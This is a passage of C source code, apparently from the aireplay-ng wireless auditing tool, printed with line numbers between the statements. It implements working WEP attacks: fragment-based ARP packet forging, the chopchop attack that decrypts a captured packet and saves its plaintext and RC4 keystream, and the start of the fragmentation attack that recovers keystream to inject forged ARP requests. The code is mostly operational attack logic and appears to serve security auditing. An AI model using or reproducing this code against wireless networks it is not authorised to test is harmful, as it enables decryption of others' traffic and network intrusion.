pkh.tv_usec = tv.tv_usec;
3006
pkh.caplen = caplen;
3011
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 ) {
3012
perror( "fwrite failed" );
3018
if( fwrite( h80211, n, 1, f_cap_out ) != 1 ) {
3019
perror( "fwrite failed" );
3023
fflush( f_cap_out );
3031
int set_clear_arp(uchar *buf, uchar *smac, uchar *dmac) //set first 22 bytes
3036
memcpy(buf, S_LLC_SNAP_ARP, 8);
3038
buf[9] = 0x01; //ethernet
3039
buf[10] = 0x08; // IP
3041
buf[12] = 0x06; //hardware size
3042
buf[13] = 0x04; //protocol size
3044
if(memcmp(dmac, BROADCAST, 6) == 0)
3045
buf[15] = 0x01; //request
3047
buf[15] = 0x02; //reply
3048
memcpy(buf+16, smac, 6);
3053
int set_final_arp(uchar *buf, uchar *mymac)
3058
//shifted by 10bytes to set source IP as target IP :)
3060
buf[0] = 0x08; // IP
3062
buf[2] = 0x06; //hardware size
3063
buf[3] = 0x04; //protocol size
3065
buf[5] = 0x01; //request
3066
memcpy(buf+6, mymac, 6); //sender mac
3067
buf[12] = 0xA9; //sender IP 169.254.87.197
3070
buf[15] = 0xC5; //end sender IP
3075
int set_clear_ip(uchar *buf, int ip_len) //set first 9 bytes
3080
memcpy(buf, S_LLC_SNAP_IP, 8);
3082
buf[10] = (ip_len >> 8) & 0xFF;
3083
buf[11] = ip_len & 0xFF;
3088
int set_final_ip(uchar *buf, uchar *mymac)
3093
//shifted by 10bytes to set source IP as target IP :)
3095
buf[0] = 0x06; //hardware size
3096
buf[1] = 0x04; //protocol size
3098
buf[3] = 0x01; //request
3099
memcpy(buf+4, mymac, 6); //sender mac
3100
buf[10] = 0xA9; //sender IP from 169.254.XXX.XXX
3106
int do_attack_cfrag( void )
3112
unsigned char bssid[6];
3113
unsigned char smac[6];
3114
unsigned char dmac[6];
3115
uchar keystream[128];
3116
uchar frag1[128], frag2[128], frag3[128];
3117
uchar clear[4096], final[4096], flip[4096];
3125
if( capture_ask_packet( &caplen, 0 ) != 0 )
3128
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3129
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3142
switch( h80211[1] & 3 )
3145
memcpy( bssid, h80211 + 16, 6 );
3146
memcpy( dmac, h80211 + 4, 6 );
3147
memcpy( smac, h80211 + 10, 6 );
3150
memcpy( bssid, h80211 + 4, 6 );
3151
memcpy( dmac, h80211 + 16, 6 );
3152
memcpy( smac, h80211 + 10, 6 );
3155
memcpy( bssid, h80211 + 10, 6 );
3156
memcpy( dmac, h80211 + 4, 6 );
3157
memcpy( smac, h80211 + 16, 6 );
3160
memcpy( bssid, h80211 + 10, 6 );
3161
memcpy( dmac, h80211 + 16, 6 );
3162
memcpy( smac, h80211 + 24, 6 );
3166
memset(clear, 0, 4096);
3167
memset(final, 0, 4096);
3168
memset(flip, 0, 4096);
3169
memset(frag1, 0, 128);
3170
memset(frag2, 0, 128);
3171
memset(frag3, 0, 128);
3172
memset(keystream, 0, 128);
3174
/* check if it's a potential ARP request */
3176
//its length 68-24 or 86-24 and going to broadcast or a unicast mac (even first byte)
3177
if( (caplen-z == 68-24 || caplen-z == 86-24) && (memcmp(dmac, BROADCAST, 6) == 0 || (dmac[0]%2) == 0) )
3180
printf("Found ARP packet\n");
3182
//build the new packet
3183
set_clear_arp(clear, smac, dmac);
3184
set_final_arp(final, opt.r_smac);
3187
keystream[i] = (h80211+z+4)[i] ^ clear[i];
3189
// correct 80211 header
3190
// h80211[0] = 0x08; //data
3191
if( (h80211[1] & 3) == 0x00 ) //ad-hoc
3193
h80211[1] = 0x40; //wep
3194
memcpy(h80211+4, smac, 6);
3195
memcpy(h80211+10, opt.r_smac, 6);
3196
memcpy(h80211+16, bssid, 6);
3202
h80211[1] = 0x41; //wep+ToDS
3203
memcpy(h80211+4 , bssid, 6);
3204
memcpy(h80211+10, opt.r_smac, 6);
3205
memcpy(h80211+16, smac, 6);
3209
h80211[1] = 0x42; //wep+FromDS
3210
memcpy(h80211+4, smac, 6);
3211
memcpy(h80211+10, bssid, 6);
3212
memcpy(h80211+16, opt.r_smac, 6);
3215
h80211[22] = 0xD0; //frag = 0;
3218
//need to shift by 10 bytes; (add 1 frag in front)
3219
memcpy(frag1, h80211, z+4); //copy 80211 header and IV
3220
frag1[1] |= 0x04; //more frags
3221
memcpy(frag1+z+4, S_LLC_SNAP_ARP, 8);
3222
frag1[z+4+8] = 0x00;
3223
frag1[z+4+9] = 0x01; //ethernet
3224
add_crc32(frag1+z+4, 10);
3226
(frag1+z+4)[i] ^= keystream[i];
3227
/* frag1 finished */
3229
for(i=0; i<caplen; i++)
3230
flip[i] = clear[i] ^ final[i];
3232
add_crc32_plain(flip, caplen-z-4-4);
3234
for(i=0; i<caplen-z-4; i++)
3235
(h80211+z+4)[i] ^= flip[i];
3236
h80211[22] = 0xD1; // frag = 1;
3238
//ready to send frag1 / len=z+4+10+4 and h80211 / len = caplen
3243
printf("Found IP packet\n");
3245
//build the new packet
3246
set_clear_ip(clear, caplen-z-4-8-4); //caplen - ieee80211header - IVIDX - LLC/SNAP - ICV
3247
set_final_ip(final, opt.r_smac);
3250
keystream[i] = (h80211+z+4)[i] ^ clear[i];
3252
// correct 80211 header
3253
// h80211[0] = 0x08; //data
3254
if( (h80211[1] & 3) == 0x00 ) //ad-hoc
3256
h80211[1] = 0x40; //wep
3257
memcpy(h80211+4, smac, 6);
3258
memcpy(h80211+10, opt.r_smac, 6);
3259
memcpy(h80211+16, bssid, 6);
3265
h80211[1] = 0x41; //wep+ToDS
3266
memcpy(h80211+4 , bssid, 6);
3267
memcpy(h80211+10, opt.r_smac, 6);
3268
memcpy(h80211+16, smac, 6);
3272
h80211[1] = 0x42; //wep+FromDS
3273
memcpy(h80211+4, smac, 6);
3274
memcpy(h80211+10, bssid, 6);
3275
memcpy(h80211+16, opt.r_smac, 6);
3278
h80211[22] = 0xD0; //frag = 0;
3281
//need to shift by 12 bytes;(add 3 frags in front)
3282
memcpy(frag1, h80211, z+4); //copy 80211 header and IV
3283
memcpy(frag2, h80211, z+4); //copy 80211 header and IV
3284
memcpy(frag3, h80211, z+4); //copy 80211 header and IV
3285
frag1[1] |= 0x04; //more frags
3286
frag2[1] |= 0x04; //more frags
3287
frag3[1] |= 0x04; //more frags
3289
memcpy(frag1+z+4, S_LLC_SNAP_ARP, 4);
3290
add_crc32(frag1+z+4, 4);
3292
(frag1+z+4)[i] ^= keystream[i];
3294
memcpy(frag2+z+4, S_LLC_SNAP_ARP+4, 4);
3295
add_crc32(frag2+z+4, 4);
3297
(frag2+z+4)[i] ^= keystream[i];
3298
frag2[22] = 0xD1; //frag = 1;
3300
frag3[z+4+0] = 0x00;
3301
frag3[z+4+1] = 0x01; //ether
3302
frag3[z+4+2] = 0x08; //IP
3303
frag3[z+4+3] = 0x00;
3304
add_crc32(frag3+z+4, 4);
3306
(frag3+z+4)[i] ^= keystream[i];
3307
frag3[22] = 0xD2; //frag = 2;
3308
/* frag1,2,3 finished */
3310
for(i=0; i<caplen; i++)
3311
flip[i] = clear[i] ^ final[i];
3313
add_crc32_plain(flip, caplen-z-4-4);
3315
for(i=0; i<caplen-z-4; i++)
3316
(h80211+z+4)[i] ^= flip[i];
3317
h80211[22] = 0xD3; // frag = 3;
3319
//ready to send frag1,2,3 / len=z+4+4+4 and h80211 / len = caplen
3323
/* loop resending the packet */
3325
/* Check if airodump-ng is running. If not, print that message */
3326
printf( "You should also start airodump-ng to capture replies.\n\n" );
3328
signal( SIGINT, sighandler );
3331
memset( ticks, 0, sizeof( ticks ) );
3340
/* wait for the next timer interrupt, or sleep */
3342
if( dev.fd_rtc >= 0 )
3344
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
3346
perror( "read(/dev/rtc) failed" );
3356
/* we can't trust usleep, since it depends on the HZ */
3358
gettimeofday( &tv, NULL );
3359
usleep( 1000000/RTC_RESOLUTION );
3360
gettimeofday( &tv2, NULL );
3362
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
3363
+ (float) ( tv2.tv_usec - tv.tv_usec );
3365
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
3366
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
3367
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
3370
/* update the status line */
3372
if( ticks[1] > (RTC_RESOLUTION/10) )
3375
printf( "\rSent %ld packets...(%d pps)\33[K\r", nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)));
3379
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION < 1 )
3382
/* threshold reached */
3386
if( nb_pkt_sent == 0 )
3391
if( send_packet( frag1, z+4+10+4 ) < 0 )
3397
if( send_packet( frag1, z+4+4+4 ) < 0 )
3399
if( send_packet( frag2, z+4+4+4 ) < 0 )
3401
if( send_packet( frag3, z+4+4+4 ) < 0 )
3405
if( send_packet( h80211, caplen ) < 0 )
3412
int do_attack_chopchop( void )
3415
int i, j, n, z, caplen, srcz;
3416
int data_start, data_end, srcdiff, diff;
3417
int guess, is_deauth_mode;
3419
int tried_header_rec=0;
3421
unsigned char b1 = 0xAA;
3422
unsigned char b2 = 0xAA;
3426
unsigned long crc_mask;
3427
unsigned char *chopped;
3435
struct pcap_file_header pfh_out;
3436
struct pcap_pkthdr pkh;
3439
if(getnet(NULL, 1, 0) != 0)
3442
srand( time( NULL ) );
3444
if( capture_ask_packet( &caplen, 0 ) != 0 )
3447
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3448
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3452
if( (unsigned)caplen > sizeof(srcbuf) || (unsigned)caplen > sizeof(h80211) )
3455
if( opt.r_smac_set == 1 )
3457
//handle picky APs (send one valid packet before all the invalid ones)
3458
memset(packet, 0, sizeof(packet));
3460
memcpy( packet, NULL_DATA, 24 );
3461
memcpy( packet + 4, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
3462
memcpy( packet + 10, opt.r_smac, 6 );
3463
memcpy( packet + 16, opt.f_bssid, 6 );
3465
packet[0] = 0x08; //make it a data packet
3466
packet[1] = 0x41; //set encryption and ToDS=1
3468
memcpy( packet+24, h80211+z, caplen-z);
3470
if( send_packet( packet, caplen-z+24 ) != 0 )
3472
//done sending a correct packet
3475
/* Special handling for spanning-tree packets */
3476
if ( memcmp( h80211 + 4, SPANTREE, 6 ) == 0 ||
3477
memcmp( h80211 + 16, SPANTREE, 6 ) == 0 )
3479
b1 = 0x42; b2 = 0x42;
3484
/* chopchop operation mode: truncate and decrypt the packet */
3485
/* we assume the plaintext starts with AA AA 03 00 00 00 */
3486
/* (42 42 03 00 00 00 for spanning-tree packets) */
3488
memcpy( srcbuf, h80211, caplen );
3490
/* setup the chopping buffer */
3492
n = caplen - z + 24;
3494
if( ( chopped = (unsigned char *) malloc( n ) ) == NULL )
3496
perror( "malloc failed" );
3500
memset( chopped, 0, n );
3502
data_start = 24 + 4;
3506
chopped[0] = 0x08; /* normal data frame */
3507
chopped[1] = 0x41; /* WEP = 1, ToDS = 1 */
3509
/* copy the duration */
3511
memcpy( chopped + 2, h80211 + 2, 2 );
3513
/* copy the BSSID */
3515
switch( h80211[1] & 3 )
3517
case 0: memcpy( chopped + 4, h80211 + 16, 6 ); break;
3518
case 1: memcpy( chopped + 4, h80211 + 4, 6 ); break;
3519
case 2: memcpy( chopped + 4, h80211 + 10, 6 ); break;
3520
default: memcpy( chopped + 4, h80211 + 10, 6 ); break;
3523
/* copy the WEP IV */
3525
memcpy( chopped + 24, h80211 + z, 4 );
3527
/* setup the xor mask to hide the original data */
3531
for( i = data_start; i < data_end - 4; i++ )
3533
switch( i - data_start )
3535
case 0: chopped[i] = b1 ^ 0xE0; break;
3536
case 1: chopped[i] = b2 ^ 0xE0; break;
3537
case 2: chopped[i] = 0x03 ^ 0x03; break;
3538
default: chopped[i] = 0x55 ^ ( i & 0xFF ); break;
3541
crc_mask = crc_tbl[crc_mask & 0xFF]
3543
^ ( chopped[i] << 24 );
3546
for( i = 0; i < 4; i++ )
3547
crc_mask = crc_tbl[crc_mask & 0xFF]
3548
^ ( crc_mask >> 8 );
3550
chopped[data_end - 4] = crc_mask; crc_mask >>= 8;
3551
chopped[data_end - 3] = crc_mask; crc_mask >>= 8;
3552
chopped[data_end - 2] = crc_mask; crc_mask >>= 8;
3553
chopped[data_end - 1] = crc_mask; crc_mask >>= 8;
3555
for( i = data_start; i < data_end; i++ )
3556
chopped[i] ^= srcbuf[i+srcdiff];
3558
data_start += 6; /* skip the SNAP header */
3560
/* if the replay source mac is unspecified, forge one */
3562
if( opt.r_smac_set == 0 )
3566
opt.r_smac[0] = 0x00;
3567
opt.r_smac[1] = rand() & 0x3E;
3568
opt.r_smac[2] = rand() & 0xFF;
3569
opt.r_smac[3] = rand() & 0xFF;
3570
opt.r_smac[4] = rand() & 0xFF;
3572
memcpy( opt.r_dmac, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
3578
opt.r_dmac[0] = 0xFF;
3579
opt.r_dmac[1] = rand() & 0xFE;
3580
opt.r_dmac[2] = rand() & 0xFF;
3581
opt.r_dmac[3] = rand() & 0xFF;
3582
opt.r_dmac[4] = rand() & 0xFF;
3585
/* let's go chopping */
3587
memset( ticks, 0, sizeof( ticks ) );
3598
signal( SIGALRM, sighandler );
3600
if(opt.port_in <= 0)
3602
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
3604
perror( "fcntl(O_NONBLOCK) failed" );
3609
while( data_end > data_start )
3614
"The chopchop attack appears to have failed. Possible reasons:\n"
3616
" * You're trying to inject with an unsupported chipset (Centrino?).\n"
3617
" * The driver source wasn't properly patched for injection support.\n"
3618
" * You are too far from the AP. Get closer or reduce the send rate.\n"
3619
" * Target is 802.11g only but you are using a Prism2 or RTL8180.\n"
3620
" * The wireless interface isn't setup on the correct channel.\n" );
3621
if( is_deauth_mode )
3623
" * The AP isn't vulnerable when operating in non-authenticated mode.\n"
3624
" Run aireplay-ng in authenticated mode instead (-h option).\n\n" );
3627
" * The client MAC you have specified is not currently authenticated.\n"
3628
" Try running another aireplay-ng to fake authentication (attack \"-1\").\n"
3629
" * The AP isn't vulnerable when operating in authenticated mode.\n"
3630
" Try aireplay-ng in non-authenticated mode instead (no -h option).\n\n" );
3634
/* wait for the next timer interrupt, or sleep */
3636
if( dev.fd_rtc >= 0 )
3638
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
3640
perror( "\nread(/dev/rtc) failed" );
3644
ticks[0]++; /* ticks since we entered the while loop */
3645
ticks[1]++; /* ticks since the last status line update */
3646
ticks[2]++; /* ticks since the last frame was sent */
3647
ticks[3]++; /* ticks since started chopping current byte */
3651
/* we can't trust usleep, since it depends on the HZ */
3653
gettimeofday( &tv, NULL );
3655
gettimeofday( &tv2, NULL );
3657
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
3658
+ (float) ( tv2.tv_usec - tv.tv_usec );
3660
ticks[0] += f / 976;
3661
ticks[1] += f / 976;
3662
ticks[2] += f / 976;
3663
ticks[3] += f / 976;
3666
/* update the status line */
3668
if( ticks[1] > (RTC_RESOLUTION/10) )
3671
printf( "\rSent %3ld packets, current guess: %02X...\33[K",
3672
nb_pkt_sent, guess );
3676
if( data_end < 41 && ticks[3] > 8 * ( ticks[0] - ticks[3] ) /
3677
(int) ( caplen - ( data_end - 1 ) ) )
3681
printf( "\n\nThe AP appears to drop packets shorter "
3682
"than %d bytes.\n",data_end );
3686
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3687
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3692
if( ( chopped[data_end + 0] ^ srcbuf[data_end + srcdiff + 0] ) == 0x06 &&
3693
( chopped[data_end + 1] ^ srcbuf[data_end + srcdiff + 1] ) == 0x04 &&
3694
( chopped[data_end + 2] ^ srcbuf[data_end + srcdiff + 2] ) == 0x00 )
3696
printf( "Enabling standard workaround: "
3697
"ARP header re-creation.\n" );
3699
chopped[24 + 10] = srcbuf[srcz + 10] ^ 0x08;
3700
chopped[24 + 11] = srcbuf[srcz + 11] ^ 0x06;
3701
chopped[24 + 12] = srcbuf[srcz + 12] ^ 0x00;
3702
chopped[24 + 13] = srcbuf[srcz + 13] ^ 0x01;
3703
chopped[24 + 14] = srcbuf[srcz + 14] ^ 0x08;
3704
chopped[24 + 15] = srcbuf[srcz + 15] ^ 0x00;
3708
printf( "Enabling standard workaround: "
3709
" IP header re-creation.\n" );
3711
n = caplen - ( z + 16 );
3713
chopped[24 + 4] = srcbuf[srcz + 4] ^ 0xAA;
3714
chopped[24 + 5] = srcbuf[srcz + 5] ^ 0xAA;
3715
chopped[24 + 6] = srcbuf[srcz + 6] ^ 0x03;
3716
chopped[24 + 7] = srcbuf[srcz + 7] ^ 0x00;
3717
chopped[24 + 8] = srcbuf[srcz + 8] ^ 0x00;
3718
chopped[24 + 9] = srcbuf[srcz + 9] ^ 0x00;
3719
chopped[24 + 10] = srcbuf[srcz + 10] ^ 0x08;
3720
chopped[24 + 11] = srcbuf[srcz + 11] ^ 0x00;
3721
chopped[24 + 14] = srcbuf[srcz + 14] ^ ( n >> 8 );
3722
chopped[24 + 15] = srcbuf[srcz + 15] ^ ( n & 0xFF );
3724
memcpy( h80211, srcbuf, caplen );
3726
for( i = z + 4; i < (int) caplen; i++ )
3727
h80211[i - 4] = h80211[i] ^ chopped[i-diff];
3729
/* sometimes the header length or the tos field vary */
3731
for( i = 0; i < 16; i++ )
3733
h80211[z + 8] = 0x40 + i;
3734
chopped[24 + 12] = srcbuf[srcz + 12] ^ ( 0x40 + i );
3736
for( j = 0; j < 256; j++ )
3739
chopped[24 + 13] = srcbuf[srcz + 13] ^ j;
3741
if( check_crc_buf( h80211 + z, caplen - z - 8 ) )
3742
goto have_crc_match;
3746
printf( "This doesn't look like an IP packet, "
3747
"try another one.\n" );
3754
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION >= 1 )
3756
/* send one modified frame */
3760
memcpy( h80211, chopped, data_end - 1 );
3762
/* note: guess 256 is special, it tests if the *
3763
* AP properly drops frames with an invalid ICV *
3764
* so this guess always has its bit 8 set to 0 */
3766
if( is_deauth_mode )
3768
opt.r_smac[1] |= ( guess < 256 );
3769
opt.r_smac[5] = guess & 0xFF;
3773
opt.r_dmac[1] |= ( guess < 256 );
3774
opt.r_dmac[5] = guess & 0xFF;
3777
memcpy( h80211 + 10, opt.r_smac, 6 );
3778
memcpy( h80211 + 16, opt.r_dmac, 6 );
3782
h80211[data_end - 2] ^= crc_chop_tbl[guess][3];
3783
h80211[data_end - 3] ^= crc_chop_tbl[guess][2];
3784
h80211[data_end - 4] ^= crc_chop_tbl[guess][1];
3785
h80211[data_end - 5] ^= crc_chop_tbl[guess][0];
3790
if( send_packet( h80211, data_end -1 ) != 0 )
3793
if( errno != EAGAIN )
3802
/* watch for a response from the AP */
3804
n = read_packet( h80211, sizeof( h80211 ), NULL );
3806
if( n < 0 ) return( 1 );
3807
if( n == 0 ) continue;
3811
/* check if it's a deauth packet */
3813
if( h80211[0] == 0xA0 || h80211[0] == 0xC0 )
3815
if( memcmp( h80211 + 4, opt.r_smac, 6 ) == 0 &&
3820
if( nb_bad_pkt > 256 )
3822
printf("\rgot several deauthentication packets - pausing 3 seconds for reconnection\n");
3830
if( h80211[4] != opt.r_smac[0] ) continue;
3831
if( h80211[6] != opt.r_smac[2] ) continue;
3832
if( h80211[7] != opt.r_smac[3] ) continue;
3833
if( h80211[8] != opt.r_smac[4] ) continue;
3835
if( ( h80211[5] & 0xFE ) !=
3836
( opt.r_smac[1] & 0xFE ) ) continue;
3838
if( ! ( h80211[5] & 1 ) )
3840
if( data_end < 41 ) goto header_rec;
3842
printf( "\n\nFailure: the access point does not properly "
3843
"discard frames with an\ninvalid ICV - try running "
3844
"aireplay-ng in authenticated mode (-h) instead.\n\n" );
3850
if( is_deauth_mode )
3853
/* check if it's a WEP data packet */
3855
if( ( h80211[0] & 0x0C ) != 8 ) continue;
3856
if( ( h80211[0] & 0x70 ) != 0 ) continue;
3857
if( ( h80211[1] & 0x03 ) != 2 ) continue;
3858
if( ( h80211[1] & 0x40 ) == 0 ) continue;
3860
/* check the extended IV (TKIP) flag */
3862
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3863
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3866
if( ( h80211[z + 3] & 0x20 ) != 0 ) continue;
3868
/* check the destination address */
3870
if( h80211[4] != opt.r_dmac[0] ) continue;
3871
if( h80211[6] != opt.r_dmac[2] ) continue;
3872
if( h80211[7] != opt.r_dmac[3] ) continue;
3873
if( h80211[8] != opt.r_dmac[4] ) continue;
3875
if( ( h80211[5] & 0xFE ) !=
3876
( opt.r_dmac[1] & 0xFE ) ) continue;
3878
if( ! ( h80211[5] & 1 ) )
3880
if( data_end < 41 ) goto header_rec;
3882
printf( "\n\nFailure: the access point does not properly "
3883
"discard frames with an\ninvalid ICV - try running "
3884
"aireplay-ng in non-authenticated mode instead.\n\n" );
3889
/* we have a winner */
3893
chopped[data_end - 1] ^= guess;
3894
chopped[data_end - 2] ^= crc_chop_tbl[guess][3];
3895
chopped[data_end - 3] ^= crc_chop_tbl[guess][2];
3896
chopped[data_end - 4] ^= crc_chop_tbl[guess][1];
3897
chopped[data_end - 5] ^= crc_chop_tbl[guess][0];
3899
n = caplen - data_start;
3901
printf( "\rOffset %4d (%2d%% done) | xor = %02X | pt = %02X | "
3902
"%4ld frames written in %5.0fms\n", data_end - 1,
3903
100 * ( caplen - data_end ) / n,
3904
chopped[data_end - 1],
3905
chopped[data_end - 1] ^ srcbuf[data_end + srcdiff - 1],
3906
nb_pkt_sent, ticks[3] );
3908
if( is_deauth_mode )
3910
opt.r_smac[1] = rand() & 0x3E;
3911
opt.r_smac[2] = rand() & 0xFF;
3912
opt.r_smac[3] = rand() & 0xFF;
3913
opt.r_smac[4] = rand() & 0xFF;
3917
opt.r_dmac[1] = rand() & 0xFE;
3918
opt.r_dmac[2] = rand() & 0xFF;
3919
opt.r_dmac[3] = rand() & 0xFF;
3920
opt.r_dmac[4] = rand() & 0xFF;
3933
/* reveal the plaintext (chopped contains the prga) */
3935
memcpy( h80211, srcbuf, caplen );
3937
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3938
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3942
chopped[24 + 4] = srcbuf[srcz + 4] ^ b1;
3943
chopped[24 + 5] = srcbuf[srcz + 5] ^ b2;
3944
chopped[24 + 6] = srcbuf[srcz + 6] ^ 0x03;
3945
chopped[24 + 7] = srcbuf[srcz + 7] ^ 0x00;
3946
chopped[24 + 8] = srcbuf[srcz + 8] ^ 0x00;
3947
chopped[24 + 9] = srcbuf[srcz + 9] ^ 0x00;
3949
for( i = z + 4; i < (int) caplen; i++ )
3950
h80211[i - 4] = h80211[i] ^ chopped[i-diff];
3952
if( ! check_crc_buf( h80211 + z, caplen - z - 8 ) ) {
3953
if (!tried_header_rec) {
3954
printf( "\nWarning: ICV checksum verification FAILED! Trying workaround.\n" );
3958
printf( "\nWorkaround couldn't fix ICV checksum.\nPacket is most likely invalid/useless\nTry another one.\n" );
3962
caplen -= 4 + 4; /* remove the WEP IV & CRC (ICV) */
3964
h80211[1] &= 0xBF; /* remove the WEP bit, too */
3966
/* save the decrypted packet */
3968
gettimeofday( &tv, NULL );
3970
pfh_out.magic = TCPDUMP_MAGIC;
3971
pfh_out.version_major = PCAP_VERSION_MAJOR;
3972
pfh_out.version_minor = PCAP_VERSION_MINOR;
3973
pfh_out.thiszone = 0;
3974
pfh_out.sigfigs = 0;
3975
pfh_out.snaplen = 65535;
3976
pfh_out.linktype = LINKTYPE_IEEE802_11;
3978
pkh.tv_sec = tv.tv_sec;
3979
pkh.tv_usec = tv.tv_usec;
3980
pkh.caplen = caplen;
3983
lt = localtime( (const time_t *) &tv.tv_sec );
3985
memset( strbuf, 0, sizeof( strbuf ) );
3986
snprintf( strbuf, sizeof( strbuf ) - 1,
3987
"replay_dec-%02d%02d-%02d%02d%02d.cap",
3988
lt->tm_mon + 1, lt->tm_mday,
3989
lt->tm_hour, lt->tm_min, lt->tm_sec );
3991
printf( "\nSaving plaintext in %s\n", strbuf );
3993
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
3995
perror( "fopen failed" );
3999
n = sizeof( struct pcap_file_header );
4001
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
4003
perror( "fwrite failed\n" );
4009
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 )
4011
perror( "fwrite failed" );
4017
if( fwrite( h80211, n, 1, f_cap_out ) != 1 )
4019
perror( "fwrite failed" );
4023
fclose( f_cap_out );
4025
/* save the RC4 stream (xor mask) */
4027
memset( strbuf, 0, sizeof( strbuf ) );
4028
snprintf( strbuf, sizeof( strbuf ) - 1,
4029
"replay_dec-%02d%02d-%02d%02d%02d.xor",
4030
lt->tm_mon + 1, lt->tm_mday,
4031
lt->tm_hour, lt->tm_min, lt->tm_sec );
4033
printf( "Saving keystream in %s\n", strbuf );
4035
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
4037
perror( "fopen failed" );
4041
n = pkh.caplen + 8 - 24;
4043
if( fwrite( chopped + 24, n, 1, f_cap_out ) != 1 )
4045
perror( "fwrite failed" );
4049
fclose( f_cap_out );
4051
printf( "\nCompleted in %lds (%0.2f bytes/s)\n\n",
4052
(long) time( NULL ) - tt,
4053
(float) ( pkh.caplen - 6 - 24 ) /
4054
(float) ( time( NULL ) - tt ) );
4059
int make_arp_request(uchar *h80211, uchar *bssid, uchar *src_mac, uchar *dst_mac, uchar *src_ip, uchar *dst_ip, int size)
4061
uchar *arp_header = (unsigned char*)"\xaa\xaa\x03\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01";
4062
uchar *header80211 = (unsigned char*)"\x08\x41\x95\x00";
4065
memcpy(h80211, header80211, 4);
4066
memcpy(h80211+4, bssid, 6);
4067
memcpy(h80211+10, src_mac, 6);
4068
memcpy(h80211+16, dst_mac, 6);
4069
h80211[22] = '\x00';
4070
h80211[23] = '\x00';
4073
memcpy(h80211+24, arp_header, 16);
4074
memcpy(h80211+40, src_mac, 6);
4075
memcpy(h80211+46, src_ip, 4);
4076
memset(h80211+50, '\x00', 6);
4077
memcpy(h80211+56, dst_ip, 4);
4079
// Insert padding bytes
4080
memset(h80211+60, '\x00', size-60);
4085
void save_prga(char *filename, uchar *iv, uchar *prga, int prgalen)
4089
xorfile = fopen(filename, "wb");
4090
unused = fwrite (iv, 1, 4, xorfile);
4091
unused = fwrite (prga, 1, prgalen, xorfile);
4095
int do_attack_fragment()
4098
uchar packet2[4096];
4102
// uchar ack[14] = "\xd4";
4107
struct timeval tv, tv2;
4124
uchar *snap_header = (unsigned char*)"\xAA\xAA\x03\x00\x00\x00\x08\x00";
4126
done = caplen = caplen2 = arplen = round = 0;
4127
prga_len = isrelay = gotit = again = length = 0;
4129
if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
4131
printf( "Please specify a source MAC (-h).\n" );
4135
if(getnet(NULL, 1, 1) != 0)
4138
if( memcmp( opt.r_dmac, NULL_MAC, 6 ) == 0 )
4140
memset( opt.r_dmac, '\xFF', 6);
4141
opt.r_dmac[5] = 0xED;
4144
if( memcmp( opt.r_sip, NULL_MAC, 4 ) == 0 )
4146
memset( opt.r_sip, '\xFF', 4);
4149
if( memcmp( opt.r_dip, NULL_MAC, 4 ) == 0 )
4151
memset( opt.r_dip, '\xFF', 4);
4154
PCT; printf ("Waiting for a data packet...\n");
4160
if( capture_ask_packet( &caplen, 0 ) != 0 )
4163
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
4164
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
4167
if((unsigned)caplen > sizeof(packet) || (unsigned)caplen > sizeof(packet2))
4170
memcpy( packet2, h80211, caplen );
4172
PCT; printf("Data packet found!\n");
4174
if ( memcmp( packet2 + 4, SPANTREE, 6 ) == 0 ||
4175
memcmp( packet2 + 16, SPANTREE, 6 ) == 0 )
4177
packet2[z+4] = ((packet2[z+4] ^ 0x42) ^ 0xAA); //0x42 instead of 0xAA
4178
packet2[z+5] = ((packet2[z+5] ^ 0x42) ^ 0xAA); //0x42 instead of 0xAA
4179
packet2[z+10] = ((packet2[z+10] ^ 0x00) ^ 0x08); //0x00 instead of 0x08
4186
memcpy( packet, packet2, caplen2 );
4188
memcpy(prga, packet+z+4, prga_len);
4189
memcpy(iv, packet+z, 4);
4191
xor_keystream(prga, snap_header, prga_len);
4193
while(again == RETRY) //sending 7byte fragments
4198
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, arplen);
4200
if ((round % 2) == 1)
4202
PCT; printf("Trying a LLC NULL packet\n");
4203
memset(h80211+24, '\x00', 39);
4208
packets=(arplen-24)/(prga_len-4);
4209
if( (arplen-24)%(prga_len-4) != 0 )
4212
PCT; printf("Sending fragmented packet\n");
4213
send_fragments(h80211, arplen, iv, prga, prga_len-4, 0);
4215
// send_packet(ack, 10);
4217
gettimeofday( &tv, NULL );
4220
while (!gotit) //waiting for relayed packet
4222
caplen = read_packet(packet, sizeof(packet), NULL);
4223
z = ( ( packet[1] & 3 ) != 3 ) ? 24 : 30;
4224
if ( ( packet[0] & 0x80 ) == 0x80 ) /* QoS */
4227
if (packet[0] == 0xD4 )
4229
